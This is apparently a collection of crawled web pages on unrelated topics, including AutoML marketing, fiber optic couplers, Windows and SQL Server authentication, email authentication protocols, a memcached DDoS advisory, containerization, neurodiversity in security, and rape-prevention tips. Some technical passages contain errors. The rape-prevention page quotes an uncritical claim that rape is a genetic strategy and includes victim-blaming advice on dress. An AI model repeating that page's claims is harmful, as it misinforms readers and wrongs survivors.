AutoAI provides all of the elements of automated machine learning described above and more. Current capabilities in Auto ML automate only a small portion of the data scientist and ML engineer's workloads. Watson Studio and AutoAI let a data science team quickly automate across the entire AI/ML lifecycle, and experiment for solving business challenges. Teams can shorten their time to market with their predictive capabilities by starting with a set of prototypes for machine learning models. AutoAI in Watson Studio simplifies automated feature engineering, automated hyperparameter optimization, and machine learning model selection. Teams of data scientists and data analysts can evaluate their hypotheses quickly, and by the time they’ve certified the validity of their models they can already have deployed them for consumption to QA or production contexts.
If you or your team want to try AutoML for advanced data science practices, we can partner with you on your newest model building initiatives. Organizations have proven the value of rapidly prototyping model training, selection, and deployment. If you're just getting started, consider some of the tutorials and use cases on IBM Developer.
Autostrade per l’Italia
Autostrade per l’Italia implemented several IBM solutions for a complete digital transformation to improve how it monitors and maintains its vast array of infrastructure assets.
MANA Community teamed with IBM Garage to build an AI platform to mine huge volumes of environmental data volumes from multiple digital channels and thousands of sources. | <urn:uuid:ee311301-e942-4f50-8d38-25f17b3947fb> | CC-MAIN-2022-40 | https://www.ibm.com/cloud/learn/automl | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335362.18/warc/CC-MAIN-20220929163117-20220929193117-00002.warc.gz | en | 0.925832 | 2,050 | 2.765625 | 3 |
A fiber optic coupler is a device used in fiber optic systems with single or more input fibers and single or several output fibers, which is different from WDM devices. WDM multiplexer and demultiplexer divide the different wavelength fiber light into different channels, while fiber optic couplers divide the light power and send it to different channel.
Most types of couplers work only in a limited range of wavelength (a limited bandwidth), since the coupling strength is wavelength-dependent (and often also polarization-dependent). This is a typical property of those couplers where the coupling occurs over a certain length. Typical bandwidths of fused couplers are a few tens of nanometers. In high-power fiber lasers and amplifiers, multimode fiber couplers are often used for combining the radiation of several laser diodes and sending them into inner cladding of the active fiber.
A basic fiber optic coupler has N input ports and M output ports. N and M typically range from 1 to 64. M is the number of input ports (one or more). N is the number of output ports and is always equal to or greater than M. The number of input ports and output ports vary depending on the intended application for the coupler.
Light from an input fiber can appear at one or more outputs, with the power distribution potentially depending on the wavelength and polarization. Such couplers can be fabricated in different ways:
Some couplers use side-polished fibers, providing access to the fiber core;
Couplers can also be made from bulk optics, for example in the form of microlenses and beam splitters, which can be coupled to fibers (“fiber pig-tailed”).
Fiber optic couplers can either be passive or active devices. Passive fiber optic couplers are simple fiber optic components that are used to redirect light waves. Passive couplers either use micro-lenses, graded-refractive-index (GRIN) rods and beam splitters, optical mixers, or splice and fuse the core of the optical fibers together. Active fiber optic couplers require an external power source. They receive input signals, and then use a combination of fiber optic detectors, optical-to-electrical converters, and light sources to transmit fiber optic signals.
Types of fiber optic couplers include optical splitters, optical combiners, X couplers, star couplers, and tree couplers. The device allows the transmission of light waves through multiple paths.
Fused couplers are used to split optical signals between two fibers, or to combine optical signals from two fibers into one fiber. They are constructed by fusing and tapering two fibers together. This method provides a simple, rugged, and compact method of splitting and combining optical signals. Typical excess losses are as low as 0.2dB, while splitting ratios are accurate to within ±5 percent at the design wavelength. The devices are bi-directional, and offer low backreflection. The technique is best suited to singlemode and multimode couplers.
Choices for fiber optic coupler also include Single window narrow band, Single window Wide band, and Dual window Wide band fiber optic coupler. Single window fiber optic coupler is with one working wavelength. Dual window fiber optic coupler is with two working wavelength. For Single mode fiber, is optimized for 1310 nm and 1550 nm; For Multimode fiber, is optimized for 850 nm and 1310 nm. | <urn:uuid:3f395b51-c78a-4360-96e8-d78b778059b0> | CC-MAIN-2022-40 | https://www.fiber-optic-tutorial.com/introduction-to-fiber-optic-couplers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337428.0/warc/CC-MAIN-20221003164901-20221003194901-00002.warc.gz | en | 0.912439 | 736 | 3.921875 | 4 |
A few weeks ago, we looked at monitoring
your Windows-based distributed applications and servers. Besides monitoring these applications once they’re running,
securing them and keeping them secure is equally important. So let’s look at some things a system administrator should
be aware of when configuring and running Windows-based distributed applications.
You’ll typically use one of two ways to secure access to part or all of an
application. You’ll either create a table of user names and passwords and
store that table in a database such as SQL Server, or you’ll use Windows
Active Directory (AD) or local SAM accounts for authentication.
Digest Authentication in IIS
With user names and passwords stored in a database, the application requests the
username and password and validates this information against the user
table in the database. The browser sends the user’s credentials to an Active
Server Pages (ASP) script that processes them. The ASP script asks SQL
Server to look up the username and password to verify
the user. This method is typically used for internet or extranet
access, where the clients are from outside your organization or perhaps
With Windows Active Directory-based authentication or with local Security
Access Manager (SAM) authentication (i.e.: No Windows Domain account),
a user visits a Web page that contains an ASP script that tries to access SQL Server.
At that point, SQL Server reverifies the user’s security credentials with the
domain controller (DC) or with the local server’s SAM. This method is typically
used when clients who will be accessing your application are part of your organization.
If MS SQL is running on a server that’s a member of a domain, SQL Server will
first check the DC to authenticate a client. If not, SQL Server checks the local
server’s SAM. Using Active Directory is best because it
centralizes the user accounts and groups in one place where all of your
servers can access them. Another advantage is that users don’t need a
second username and password to access the application if the account with
which they’re logging on to their workstation is on the server or in the
Other methods of Authentication
In addition to Windows integrated and basic authentication in IIS,
there are other methods of authenticating users who visit a Web site.
One thing you can do is map a client certificate to a local Windows or domain user
account. When users connect using that certificate, IIS (5.0 or later only) uses the mapped account
to log on the user and those account credentials are used to access resources.
Another alternative (again for Win2K or later and IIS 5.0 or later shops
only) is digest authentication. When you use digest authentication, the browser
creates a hashed version of the username and password along with
other information. These credentials can’t be easily deciphered, but the DC can match
the hashed information with the plaintext version stored on the DC. In this way, digest authentication
lets the browser and server authenticate the user without sending clear-text passwords. In order to use
digest authentication, the browser must be IE 5.5 or later, and the IIS server must be part
of an Active Directory domain.
Authorization can be simply described as granting permissions to resources. This might mean granting ‘read’ or
‘read/write’ permissions to the accounts or groups you’ve configured authentication for. Typically these are applied
to the folder where the web-based portion of your application resides. It might mean configuring impersonation settings
in DCOM or ASP.NET
components, particularly if your users or clients are from outside your organization or are a mixture of internal and external users.
It also might mean configuring some very specific settings in SQL Server, which we’ll cover below.
The SQL Server side of things: Roles and permissions
Standard SQL Server Roles
You can set up a Windows user or group as a SQL Server login and then use that login in various ways. One way is to make the SQL Server login (The Windows user or group) part of a SQL Server role that has the necessary permissions
to the database. To add an existing login to a role, perform the following steps:
- Open Enterprise Manager.
- Open the Databases folder.
- Open the database to which you want to add the login.
- Select the Roles folder for the database.
- Right-click the role to which you want to add the login, and select
- Click Add, select the login to add, then click OK.
- Click OK to close the role properties and complete the action.
- Open Enterprise Manager.
- Open the Databases folder.
- Open the database to which you want to add the permissions.
- Select the Stored Procedures folder for the database and select Properties.
- Click the Permissions button.
- Under the Users/Database Roles column, select the account you wish to grant permission to.
- Click the appropriate column (for instance ‘Exec’ to allow the account execute permissions on that stored procedure)
- Click OK twice to close the stored procedure properties and complete the action.
If you used these steps to add a login to the db_datawriter role for instance,
SQL Server would now be able to authenticate users in that group and allow them
to read data from and write data to the database you chose in step 3, above. And you could open the
properties for that SQL Server login, clear the Northwind database entry on the Database Access page,
and users in this group would still have access to that database because they’re still in
the db_datareader and db_datawriter roles. However, the group would not have insert, update or delete
permission because you haven’t granted those permissions. You could create another login and assign it to another
role that provides more authority (such as db_owner).
Stored Procedure Permissions
If you need even more control over security than just letting a login
have access to an entire database, you can edit the role selections you
made when you created the login or add your own roles with custom
permissions. The roles you create can limit or grant access to specific
tables and even to specific columns.
Best practice in many application environments is to grant users or roles
permissions to the stored procedures that operate on a database,
rather than granting them direct access to the actual data:
So now we’ve covered authentication and authorization in Windows-based distributed application environments. In Part II, we’ll cover some best practices for securing IIS and Microsoft SQL Server specifically. See you then! | <urn:uuid:9249fdef-2bf1-45c3-b959-9982d5854b93> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/os/secure-your-distributed-windows-apps/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337531.3/warc/CC-MAIN-20221005011205-20221005041205-00002.warc.gz | en | 0.848513 | 1,468 | 2.734375 | 3 |
The Simple Mail Transfer Protocol (SMTP) does not have any intrinsic methods of proving the authenticity, integrity, and confidentiality of individual messages. As such, it’s relatively easy for third parties to spoof the source of an email, to intercept and modify authentic email, and to monitor the contents of an email. In fact, anybody may claim to have sent an email from an arbitrary source domain.
Over the decades, multiple additional protocols have been developed in order to address these three basic weaknesses of email. Some serve to prove the identities of users of the email protocol (PGP/GPG or other public key cryptography based on individuals), while others are more focused on proving the authenticity and integrity of any email from a particular domain. In this article, we will explore three protocols of the latter category.
The SPF was developed to let domain owners explicitly state which hosts were allowed to send email from that domain. Email receivers may then use the SPF to ascertain the authenticity of an email by way of one or more Domain Name System (DNS) lookups. However, the SPF does not provide cryptographic assertions as to the authenticity of an email. It consists merely of a set of rules to match host names or IP addresses.
A domain may specify the SPF policies within a DNS
TXT record, which will tend to look something like the following if the domain owner does not host their own mail servers:
"v=spf1 include:spf.protection.outlook.com -all"
Notice, that the SPF policy entry starts with a header that specifies the SPF version (
v=spf1), and is followed by a series of statements (or mechanisms) that specify the policy in left-to-right direction. The SPF recognizes eight such statements, which we’ll look into a bit further down. One of the two we see in the example above,
include, merges another domain’s SPF policy with the owned domain. Its SPF policy is much longer, and itself includes to two other domains recursively. Note, that when specifying the SPF policy, the SPF proposed standard explicitly states that a maximum number of DNS lookups (usually 10) for the verifying party must be enforced. So take care not to nest too many SPF policies.
"v=spf1 ip4:184.108.40.206/26 ip4:220.127.116.11/24 ip4:18.104.22.168/24 ip4:22.214.171.124/24 ip4:126.96.36.199/23 ip4:188.8.131.52/24 ip4:184.108.40.206/24 ip4:220.127.116.11/24 include:spfa.protection.outlook.com -all"
include, SPF also recognizes the statements
all statement is a catch-all statement and should only be used at the end of a policy. The statements
ip6 allow the specification of the IP addresses of hosts that are allowed to send email from the domain in question. The statements
mx allow domain owners to specify a host name whose IP address(es) in the equivalent DNS record (
MX) must match the source address of the email under scrutiny. The
ptr statement requires a two-step DNS lookup (IP address ⇒ domain name ⇒ IP address) to result in equal IP addresses for a match. And, lastly, the
exists statement requires the specified domain name entry (
A record) exist for a match. The big part here is that the
exist statement allows macro expansions on the side of the verifying party.
The aforementioned statements may each be prefixed with one of the qualifiers
~ “SoftFail”, and
? “Neutral”, which change what qualifies as a match to the following statement. The qualifier
- will cause the email to be refused completely upon rule match. The qualifier
~ will recommend to the evaluating party that an email is accepted, but categorized as SPAM. The qualifier
? will issue no recommendation to the evaluating party. If no qualifier is specified,
+ is assumed.
In addition to mechanisms and qualifiers, modifiers may be used to either
redirect (or defer) to the authority of another domain, or to specify an
exp-planation for the denial of an email, which will be relayed to the recipient of the denied email. The latter modifier also allows macro expansions.
While the SPF does not provide cryptographic guarantees for the authenticity of email, DKIM does so by signing every legitimate outgoing email with a private key defined by the domain owner. In order to work, DKIM relies on two things: first, a DNS
TXT record that will contain the public key for DKIM email validation, obtained from a DNS
TXT record lookup of a name of the form
"v=DKIM1; k=rsa; p=[Base64-encoded public key]"
Second, every authentic email sent by the domain in question will contain the header
Dkim-Signature. Its value will contain at least 8 parameters that serve to specify the DKIM protocol version, the signature algorithm, what parts of the email were included in the signature, the aforementioned selector and domain to be queried for the DKIM public key, as well as the Base64-encoded cryptographic signature.
Thus, the DKIM protocol will allow email recipients’ servers to verify the authenticity and integrity of the signed parts of an email (note, that the body is not always signed). But because the DKIM protocol cannot be enforced, it does not protect against fraudulent email, and as such, the DKIM protocol should be used at least in conjunction with the SPF.
The DMARC protocol builds upon the SPF and DKIM by introducing the ability to monitor a domain for illegitimate email. In order for DMARC to work, both the SPF and DKIM must be set up. Akin to the SPF and DKIM, DMARC uses the DNS
TXT record of the DNS name
_dmarc.example.com to specify its policy:
Apart from the protocol and version parameter, DMARC defines ten parameters in total. The parameter
p specifies the policy for the domain with one of three values
reject, which have similar functions to the SPF qualifiers
-. Specifying this parameter is necessary for DMARC to function. The parameter
sp allows setting a distinct policy for subdomains. The parameters
aspf allows changing how email from subdomains is treated when the DKIM or SPF policies were issued only for the organizational domain. The parameters
ruf specify where the DMARC reports should be sent to. The former address will receive aggregate reports, while the latter will receive detailed reports for each DMARC validation failure. The parameters
ri allow the fine-tuning of the behavior of the DMARC policy. Note too, that the parameters
pct can be changed to allow domain owners to gradually enforce the DMARC policy.
Let our Red Team conduct a professional social engineering test!
Our experts will get in contact with you!
Further articles available here | <urn:uuid:2b71f075-03a8-46a4-8539-3b665f53e748> | CC-MAIN-2022-40 | https://www.scip.ch/en/?labs.20171109 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337531.3/warc/CC-MAIN-20221005011205-20221005041205-00002.warc.gz | en | 0.877837 | 1,663 | 3.375 | 3 |
Memcache is temporary data storage service used to improve the overall performance of the website by storing chunks of data in a cache. If misconfigured memcached on port 11211 UDP & TCP is used to cause reflection DOS attack (send a spoofed packet to a device and have it reflected back).
Memcached allows access to the data stored in the cache without any form of authentication and the attacker can easily access data in the corresponding caches and even modify them.
How to Fix:
- Bind the Memcache server to a particular Source IP Only.
- Don’t expose this service in the DMZ environment or over the Internet.
- Update ACLs and Firewalls to track or block UDP/TCP port 11211 for all ingress and egress traffic.
More details at:
- US-CERT publication | <urn:uuid:84891a2b-8123-4242-91e9-99783c749fed> | CC-MAIN-2022-40 | https://www.btcirt.bt/the-memcached-reflectionamplification-ddos-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338244.64/warc/CC-MAIN-20221007175237-20221007205237-00002.warc.gz | en | 0.69703 | 294 | 2.71875 | 3 |
In most countries around the world, citizens carry identification for those times when it’s necessary to prove to an authority figure who they are. It can be something as simple as a trip to the post office to prove that they’re the intended package recipient, or urgent times like a hospital visit that requires the staff notify close family.
For business, the idea of an ID is important for paying taxes, complying with regulations and organizing finances. When traveling, countries have agreed on a system of passports so that legitimate foreign visitors can make themselves known. All these cases share a common thread. Authorities must be shown an internationally (and sometimes domestically) accepted ID.
Committing to a common form of identification like a passport, which is almost identical no matter which nationality you hold, is a straightforward way for the world’s authorities and governments to promote law and order.
Accountability, no matter where you are, is important. Physical IDs are crucial in this regard because they’re relatively difficult to forge, accurate and reasonably secure. However, innovative ideas about one’s digital identity are emerging that could change that. Partly due to some frightening events like the recent Equifax breach, in which hackers stole the personal identifying data of more than 150 million people, keeping one’s digital identity safe is a hot button issue. It’s also relevant because technology like blockchain is finding new ways to answer these hard questions.
How far can blockchain go?
For something as important as an identity, governments still need the ability to determine which modes of ID it deems authentic. Just as they agreed on the booklet format of a passport and the information included within, they must also do so for the next generation of IDs. Blockchain represents the most likely candidate to revolutionize the idea of identification, but there are some hurdles in its way.
Governments can hardly stop speculative blockchain solutions from investors who operate remotely and need no centralized authority, but crossing a physical border is a different issue entirely. Blockchain allows vast numbers of geographically distant users to consent to a single system, but can governments agree on which system they’ll accept? Support for a common blockchain system between regular people is easy to find, but getting governments to change policy accordingly is another story. Unilateral international agreement between them on which blockchain people will use to identify themselves becomes a real issue.
The key to unlocking international blockchain IDs
There are already blockchain innovators discussing these important ideas between themselves.
New platforms such as SelfKey aim to answer any questions governments have when they inevitably come knocking. The company envisions a blockchain ecosystem that has two crucial functions: the ability for people to register for an array of financial and civic services, and efforts bring different jurisdictions together who allow their citizens to register for services. So far, people can use the KEY cryptocurrency to establish their irrefutable blockchain ID, and to register a new business, establish residency, buy international health insurance, start a new foundation or bank account, and more.
Many of these services are supported in jurisdictions around the world, so people can travel and have a universal ability to prove their status, no matter where they are.
“Citizenship in countries like Vanuatu and Grenada will be available for purchase to users of the SelfKey identity wallet immediately at launch. To streamline this process, we use a reusable KYC compliant identity wallet which will help all parties in the application process,” said Edmund John Lowell, founder of SelfKey.
Other platforms take a different approach to blockchain IDs, by using mobile technology and biometric identification (like the thumbprint login functionality on iPhones and some laptops). Regardless of how companies think that a self-sovereign ID will come about, all will require the help of governments to make it happen.
Can blockchain bypass governments?
One interesting idea to ponder is how a decentralized identity would work without government consent. Can citizens decide who is legitimate, even if the government doesn’t agree that they are? We are still too far from this reality to comprehend what such a world would require. The more realistic goal is to encourage governments, central banks, and other societal infrastructure to accept blockchain as a solution to some of their problems.
Thankfully, even for blockchain companies that aren’t thinking on such a big scale, it’s becoming more recognized that compliance with the status quo is necessary in driving change. As the two worlds collide, a better one will be born on the back of those who are only today sculpting their vision. | <urn:uuid:1bfbaad8-7d9a-437b-a178-c1cc3fa22dc1> | CC-MAIN-2022-40 | https://www.cio.com/article/227924/blockchain-ids-need-international-consensus.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338244.64/warc/CC-MAIN-20221007175237-20221007205237-00002.warc.gz | en | 0.949802 | 924 | 2.71875 | 3 |
Containerization is a technology that allows software developers to package software and applications in code and run them in isolated compute environments as immutable executable images. These containerized application images contain all the necessary files, configurations, libraries, and binaries needed to run that specific application. As a result, when a container is run, it depends only on the host OS kernel, thanks to containerization engines like Docker Engine that serve as the interface between the application runtime and the OS kernel.
This article is an overview of the role of application containerization in modern software deployments, including how containerization differs from virtualization at the OS level, the benefits of using containerization, and how to containerize an application.
Containerization vs. Virtualization (VMs)
Virtual machines are another kind of system isolation, but there are some major differences between virtual machines and application containers. Virtual machines are much more heavyweight than application containers. Also, because they’re designed to emulate entire systems, and not just single applications, they can take on workloads with higher resource requirements.
VMs emulate, or virtualize, an entire computer system, including the OS kernel, allowing for a single host machine to run one or more guest virtual machines. These guest virtual machines are managed by what is called a hypervisor, which runs on the host machine and coordinates both the filesystem and hardware resources of the host machine among the guest virtual machines.
What’s the advantage of allowing a host machine to run one or more virtual machines? The ability to host a variety of different workloads and use cases via multiple guest virtual machines on a single host machine gives organizations and cloud providers a lot of flexibility when it comes to resource utilization.
A large and powerful physical machine may require a certain portfolio of virtual machines one year, but as business needs change or architectures evolve, the ability to scale those infrastructure resources up or down and vary their properties without having to necessarily buy a new set of hardware is of huge value to both cloud providers and users managing their own data centers.
The Benefits of Containerizing Your Application
Developing software in containerized environments has several advantages over the more traditional software paradigm of only packaging application code and running it directly on the host system. Just as virtual machines provide flexibility and elastic scaling properties to cloud providers and data centers, leveraging containerization to package and run software applications can bring even more, and similar, advantages.
A containerized application, due to the fact that dependencies outside the container are minimal, can run reliably in different environments. One example where this is advantageous is the sidecar model in a microservice architecture. Here, a generalized function such as metrics collection or service registration runs as a process alongside a variety of different services. Containerization helps to encapsulate dependencies of this sidecar process, eliminating the need for the host to have those dependencies already installed. Consistency across development, staging, and production environments is another benefit of the portability of containerized applications.
Containerization Is Declarative
The ability to declaratively define application dependencies in code allows the application to have more control over its runtime environment. Applications that rely on host-installed packages may run into compatibility issues, unexpected runtime errors, and other problems, especially if the application needs to run in different environments or the host environment is otherwise unstable.
Developer Velocity and Portability
Running applications in isolated containers that encapsulate all the necessary dependencies eliminates a class of problems for developers by introducing a run-anywhere paradigm. Software packaged in this way is no longer coupled with the host OS, simplifying dependency management. The consistency of a containerized runtime in different environments can also benefit the development lifecycle, enabling software to be run reliably in development, staging, and production environments.
Fault Isolation and Security Controls
Because containerized applications are isolated at the process level, fatal crashes in one container will not affect other running containers. Containers can also integrate with host-level security policies, and virtualized resources provide isolation from physical host-level resources that can block malicious code from accessing the host system.
Container-specific configurations can also add security controls on top, limiting access to resources and enacting additional security policies. Still, containers in and of themselves are not a holistic defense from security threats, and the ability to compose multiple container images within a single container increases the surface area of security concerns when using images from third parties.
Resource and Server Efficiency
Application containers are more lightweight than virtual machines, since they leverage the host OS kernel and the resulting images only package what an application needs. This results in a lighter footprint and the ability to flexibly run multiple containers in a single compute environment, which leads to more efficient resource utilization.
Within a compute context, whether on a virtual machine, physical machine, or otherwise, many different application containers can and are run simultaneously and flexibly due to their properties of being portable and isolated. The use of virtual machines and containerization are not mutually exclusive, and in fact are often used together. A common industry pattern is for a cloud-native software organization to run their containerized applications on a cloud provider’s virtual machines.
The advent of platforms such as Kubernetes can further increase the server efficiencies of using application containers by decoupling and abstracting applications from the underlying infrastructure and federating the assignment of containers across clusters of servers. This allows for even more flexible resource optimization opportunities than at the virtual machine layer and simplifies infrastructure management for software developers.
How to Containerize an Application
The following is a general and simplified illustration of how to containerize a software application to provide a high-level overview of what a containerization workflow might look like.
The development lifecycle of a containerized application falls into roughly three phases.
When you develop the application and commit the source code, you define an application’s dependencies into a container image file, such as a Dockerfile. Traditional source code management is very compatible with the containerization model because all container configuration is stored as code, usually alongside the source code of the application. In some cases, for example if using Docker Engine, containerizing an existing application can be as simple as adding and configuring a Dockerfile and associated dependencies to the source code.
Here, you build and publish the image to a container repository, where it is immutable, versioned, and tagged. Once an application includes an image definition file such as a Dockerfile and is configured to install and pull required dependencies into an image, it’s time to materialize an image and store it. You can do this either locally or in a remote repository where it can be referenced and downloaded.
Lastly, you deploy and run the containerized application locally, in CI/CD pipelines or testing environments, in staging, or in a production environment. Once a published image is accessible by an environment, the image represents an executable that can then be run. Again using Docker Engine as an example, the target environment that will be running the container will need to have the Docker Daemon installed, which is a long-running service that manages the creation and running of the containerized processes. The Docker CLI provides an interface to manually or programmatically run the containerized application.
There are many different containerization technologies and container orchestration methods and platforms to choose from, so each organization should do a thorough evaluation when selecting the technology they’d like to adopt. That being said, the Open Container Initiative, founded in part by the Docker team, works to define industry standards and specifications for container runtimes and images.
Containerization and Microservice Architecture
While there are advantages to operating monolithic services, such as uniform tooling, lower latencies for various operations, and simpler observability and deploys, many complex applications are being broken down into smaller pieces, or services, that interact with each other in what’s called a microservice architecture. How microservice architectures are designed and how monoliths are broken into microservices is a complex topic in and of itself, and outside the scope of this article. But it’s easy to see how application containerization becomes a very relevant and beneficial tool when deploying and hosting microservices.
A simple example: Imagine a monolithic application that serves web requests, processes those requests with business logic, and also maintains connections with the database layer. As the complexity of each layer grows over time, the business decides that it would be a good strategic move to separate this application into three separate services: a web service tier, a core logic API service, and a database service.
Now, instead of running large heavyweight processes in VMs, the organization decides to containerize these separate applications with very scoped and specific concerns. They even have a choice of either managing each specialized service in their own elastic clusters of virtual machines and scaling the number of containers in each VM, or using a platform like Kubernetes to abstract away the management of the infrastructure.
Is Containerization Right for You?
The developer-friendliness of modern containerization technologies like Docker make it an approachable technology to incorporate into a proof-of-concept. If it’s possible to introduce containerization into your software deployment cycle iteratively, such as containerizing a single service or a sidecar service, this may be a good way to gain operational experience with the technology and make a decision.
The choice to leverage containerization may or may not be simple, depending on the size and scale of your current organization. Introducing and adopting any new technology, however developer-friendly, requires an understanding of what benefits and what tradeoffs may be involved, especially where observability and security may be concerned.
That being said, there is a broad and growing community of developer support, and there are early indications that containerization is becoming more of an industry standard. Especially if your software is in the early stages or you’re working with a greenfield, leveraging containerization may be a good option and allow you to take advantage of some of the most modern technological advances in software development and deployment. | <urn:uuid:8863d637-6b96-474c-9977-bddc32a122f4> | CC-MAIN-2022-40 | https://www.crowdstrike.com/cybersecurity-101/cloud-security/containerization/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00202.warc.gz | en | 0.9125 | 2,058 | 3.171875 | 3 |
The cybersecurity skills shortage and workforce gap continue to be of concern to organizations. As they seek to protect digital assets by finding professionals with the right skills, demand remains higher than supply.
With recent surveys suggesting the cybersecurity workforce gap decreased in 2020 from previous years — from 4 million worldwide in 2019 to 3.1 million in 2020 — 28% of CISOs firmly believe that "serious disruptions" will occur if these roles are not filled. Around 76% of CIOs and CISOs believe the answer to this shortage lies in a more diverse skill set among those tackling cybersecurity tasks. Additionally, a third of infosec professionals agree that neurodiversity will make cybersecurity defenses stronger while also helping to eliminate bias in the industry.
Defining Diversity and Neurodiversity
Diversity is nature's way of increasing its odds of survival. It's a fact that genetic diversity helps maintain a healthy population and build up resistance to diseases, while allowing it to adapt to change.
Neurodiversity is considered a natural genetic variation in the population and usually refers to the range of neurological differences in brain functions and behavioral traits, typically associated with social skills, learning ability, and mood. Commonly, individuals that diverge from the dominant societal standards of "normal" neurocognitive functioning are referred to as neurodivergent.
Since first introduced as a concept in the late '90s, neurodiversity has also become a social justice movement that seeks civil rights, equality, respect, and full societal inclusion for the neurodivergent. Regardless of the specific definition, the topic is typically associated with individuals that may be diagnosed with ADHD (attention deficit hyperactivity disorder) or on the autism spectrum and possess exceptional high pattern-recognition abilities, attention to detail, focus, and even outside-the-box thinking.
Diversity, including neurodiversity, in cybersecurity could improve an organizations' overall resilience to cyberattacks. Cybersecurity teams combining professionals with unique skill sets from different educational and social backgrounds, genders, ethnicities, and even with exceptional neurological abilities, can build the right pool of talent to tackle a wide range of cybersecurity challenges.
How Cybercriminals Leverage Diversity and Neurodiversity
Cybercriminals may have long embraced neurodiversity. With no rules on educational background or hiring practices, the cybercriminal community often simply seeks the person who can do the job best. It's likely that most cybercriminal gang members have different social backgrounds, are of different ethnicity or religion and possess differing levels of education, but that doesn't stop them from breaching some of the largest companies or pulling off massive digital heists.
Consider the cybercriminals diagnosed with Asperger's syndrome who pulled off hacks against the Federal Bureau of Investigation, the US Army, the Missile Defense Agency, and the Federal Reserve. It's safe to speculate that diversity and neurodiversity are no strangers to cybercrime.
Although there is little to no empirical evidence to suggest the relationship between autistic individuals and cyber-driven crimes, some studies have tried to find a link between cybercrime and gifted individuals. However, due to the nature of the Internet and cybercrime, it is difficult to find and prosecute these criminals, let alone study and assess their cognitive abilities.
Strengthening Cybersecurity Efforts
Four in 10 cybersecurity professionals believe communication remains one of the biggest barriers in the cybersecurity industry. Tech jargon brought into the boardroom can significantly hamper board members' understanding of the security risk their organization faces. This, in turn, can negatively affect security budgets because of the lack of perceived risk.
Diversity of talent on cybersecurity teams could potentially solve this communication problem. Building teams with different skill sets ranging outside technical qualifications can have a positive impact.
For example, instead of creating an all-tech team, each with their area of expertise, infosec leaders should consider adding a staff member who's an excellent communicator. He or she could translate technical details and present them in terms non-technical board members can understand, providing clear insight on the organization's security challenges, which in turn could lead to positive outcomes, including improved cybersecurity posture of the organization. Gaining buy-in from board members and achieving cybersecurity objectives is one goal where a non-technical member of a security team can be invaluable.
Incorporating neurodiversity into cybersecurity teams may have additional positive impacts. Employees that are uniquely skilled at finding patterns in seemingly unrelated data or relentlessly pursuing potential signs of data breaches could prove invaluable as part of companies' efforts to detect and respond to threats. While automation currently does most of the heavy lifting in spotting these anomalies, security team members with unique skills and attention to detail may contribute additional insights and correlations that validate findings and even improve tuning of automated systems.
Of course, there's no recipe for success in building diversity and neurodiversity into a cybersecurity team. Motivating people with different skill sets and from across the neurodivergent spectrum may prove challenging, but a growing number of CIOs and CISOs believe neurodiversity in the sector will help combat advanced persistent threats and cyberwarfare.
Striking the balance between using the best security technologies, automation, and people should be a goal for any organization when pursuing a more effective cybersecurity posture. | <urn:uuid:f8824ac4-5e0a-4e7e-9139-626f3ef3a9ea> | CC-MAIN-2022-40 | https://www.darkreading.com/careers-and-people/how-neurodiversity-can-strengthen-cybersecurity-defense | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00403.warc.gz | en | 0.939157 | 1,069 | 3.3125 | 3 |
Tips on how to avoid and prevent rape?
A woman is raped in India every 20 minutes. Rape is an act of violence perpetrated against another person. The topic of rape is not a pleasant one, but it is a subject that women of all ages, races, and nationalities should take seriously enough to find out about.
In the past, people felt safe and secure behind the locked doors of their own homes. Studies have shown that the female rapes that took place in 2000 happened inside the victim’s own homes. It is hypothesized that rape is homologous to similar behavior in other animals. "Human rape appears not as an aberration but as an alternative gene-promotion strategy that is most likely to be adopted by the losers in the competitive, harem-building struggle. If the means of access to legitimate, consenting sex is not available, then a male may be faced with the choice between force or genetic extinction."
Ways to prevent rape
- The first reaction is to get away from that danger as quickly as possible and run away screaming for help.
- Learn how to defend yourself from an attack. Take a self-defense course, martial arts, or boxing. Carry pepper spray. When in public, walk confidently and purposefully. Do not act distracted or uncertain. Do not walk around in public chatting on a phone or texting. If you exercise outdoors, do not wear headphones. Vary your routine.
- Areas: Even if it is daytime, late hours, or at night, avoid risk areas such as dark places, dimly lighted areas, lonely places, bushy areas, short-cuts, and being alone in a room with a man other than your husband, fiancé, or brother.
- Alertness: Walk with eyes and ears open, so that you know what is happening around you. Antisocialists can grab you, knock you down, tear your clothes, or even use drugs.
- Mode of dressing: When you are at home, school, place of work, or anywhere else, make sure you wear clothes that do not embarrass you, or which attract too much negative attention from men/boys.
- When a man starts seductive signals, praises, and giving you gifts, be careful to avoid and say no to all these.
- Use your cell phone as a safety tool. Make sure it’s fully charged before you go out, and if you find yourself in a sketchy situation
- Company: It is a good practice especially when it’s late to walk in the company of known friends, workmates or schoolmates. In case antisocialists strike, they can easily raise alarm and get help when you are many.
- Do not accept money, sweet things, and snack foods from people you do not know, watchmen, or even male neighbors.
- Do not accept lifts from people you do not know, these could be cars, bikes, or motorbikes.
- Suspicion: Never trust men completely unless he is your husband or fiancé. Antisocialists can be strangers or people whom you know well; they do not have outward signs.
- Parental guidance: Try to avoid sending your daughters late at night to the shops, river, other peoples’ homes’ or anywhere else. Do not leave your daughters no matter how young with male strangers or distant relatives you are not sure of.
- Practice being careful when going into your house or car because someone could easily push you in and lock the door behind you. Be aware of your surroundings; carry your keys ready in your hand and look around you before opening the door.
- Keep personal information private. Don’t advertise your info verbally or on the Internet. Also, be very wary of meeting up with anyone whom you meet on the Internet. There is never a good reason to meet up with a person whom you have never met in person, or who talks you into meeting up when you are hesitant. If you think you must do so, bring someone else, preferably a friend who is older, and meet the person in a public place.
- Walk with confidence. Look up as you walk and stand up straight; pretending as though you have two big panthers on either side of you as you walk may sound silly, but it can help boost confidence. Attackers are more likely to go for those who they think cannot defend themselves.
- Make eye contact if you are being followed by someone who you think is a potential threat. An attacker may be less likely to strike if they think you will be able to clearly identify them.
